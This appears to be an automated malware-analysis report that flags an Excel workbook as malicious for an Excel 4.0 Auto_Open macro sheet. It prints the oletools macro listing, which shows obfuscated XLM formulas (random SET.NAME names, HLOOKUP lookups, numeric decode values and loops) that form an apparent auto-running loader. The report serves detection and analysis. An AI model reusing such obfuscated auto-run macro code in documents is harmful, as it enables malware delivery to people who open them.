MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6686 bytes |
SHA-256: 69c8084372806916cfb209997fdb1c9b285ca4c39fb6a623e52430401419121b |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - KLkKUn
' 0018 23 LABEL : Cell Value, String Constant - AKpVuBvi len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G173
' 0018 23 LABEL : Cell Value, String Constant - BrvfFGIu len=0
' 0018 20 LABEL : Cell Value, String Constant - cctFK len=0
' 0018 26 LABEL : Cell Value, String Constant - CJveNgKvFuH len=0
' 0018 23 LABEL : Cell Value, String Constant - cWAcOTbX len=0
' 0018 20 LABEL : Cell Value, String Constant - HoPxg len=0
' 0018 22 LABEL : Cell Value, String Constant - IugDnFm len=0
' 0018 21 LABEL : Cell Value, String Constant - NNYinM len=0
' 0018 22 LABEL : Cell Value, String Constant - nYnDLbV len=0
' 0018 21 LABEL : Cell Value, String Constant - omFnvS len=0
' 0018 20 LABEL : Cell Value, String Constant - OrhMW len=0
' 0018 27 LABEL : Cell Value, String Constant - pgaeRTghJGNR len=0
' 0018 20 LABEL : Cell Value, String Constant - phBrd len=0
' 0018 25 LABEL : Cell Value, String Constant - PoGMkwrjGk len=0
' 0018 23 LABEL : Cell Value, String Constant - pvnbwEqN len=0
' 0018 25 LABEL : Cell Value, String Constant - RnZUZvAQFl len=0
' 0018 24 LABEL : Cell Value, String Constant - tVRgPweoz len=0
' 0018 23 LABEL : Cell Value, String Constant - uEIJcfVS len=0
' 0018 23 LABEL : Cell Value, String Constant - vGtGIQju len=0
' 0018 26 LABEL : Cell Value, String Constant - xNYDrFUaKci len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' KLkKUn,G76,"SET.NAME("AKpVuBvi",0+VALUE("0"))",""
' KLkKUn,G79,"SET.NAME("IugDnFm",AKpVuBvi)",""
' KLkKUn,G82,"SET.NAME("RnZUZvAQFl",AKpVuBvi)",""
' KLkKUn,G86,"SET.NAME("xNYDrFUaKci",COUNTA(vGtGIQju))",""
' KLkKUn,P87,"",-673.00000000000000000000
' KLkKUn,P88,"",162.00000000000000000000
' KLkKUn,P89,"",-653.00000000000000000000
' KLkKUn,G90,"SET.NAME("omFnvS",COUNTA(OrhMW))",""
' KLkKUn,P90,"",801.00000000000000000000
' KLkKUn,P91,"",-677.00000000000000000000
' KLkKUn,P92,"",-828.00000000000000000000
' KLkKUn,G94,[],""
' KLkKUn,G98,"SET.NAME("NNYinM","")",""
' KLkKUn,G103,"IugDnFm",""
' KLkKUn,G106,"SET.NAME("CJveNgKvFuH",HLOOKUP("*",vGtGIQju,IugDnFm,FALSE))",""
' KLkKUn,G108,"cWAcOTbX",""
' KLkKUn,G111,"SET.NAME("nYnDLbV",AKpVuBvi)",""
' KLkKUn,G115,[],""
' KLkKUn,G119,"nYnDLbV",""
' KLkKUn,G123,"tVRgPweoz",""
' KLkKUn,G126,"PoGMkwrjGk",""
' KLkKUn,G129,"BrvfFGIu",""
' KLkKUn,G133,"SET.NAME("pgaeRTghJGNR",VALUE(HLOOKUP("*",OrhMW,BrvfFGIu,FALSE)))",""
' KLkKUn,G136,"pvnbwEqN",""
' KLkKUn,G141,"NNYinM",""
' KLkKUn,G144,"RnZUZvAQFl",""
' KLkKUn,G148,NEXT(),""
' KLkKUn,G153,"phBrd",""
' KLkKUn,G157,[],""
' KLkKUn,G161,"HoPxg",""
' KLkKUn,G166,NEXT(),""
' KLkKUn,G168,RETURN(),""
' KLkKUn,G197,"SET.NAME("uEIJcfVS",G76)",""
' KLkKUn,G199,"vGtGIQju",""
' KLkKUn,G203,"SET.NAME("OrhMW",R63C15)",""
' KLkKUn,G207,"SET.NAME("HoPxg",216)",""
' KLkKUn,G210,"SET.NAME("cctFK",7)",""
' KLkKUn,G215,uEIJcfVS(),""
' KLkKUn,G216,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.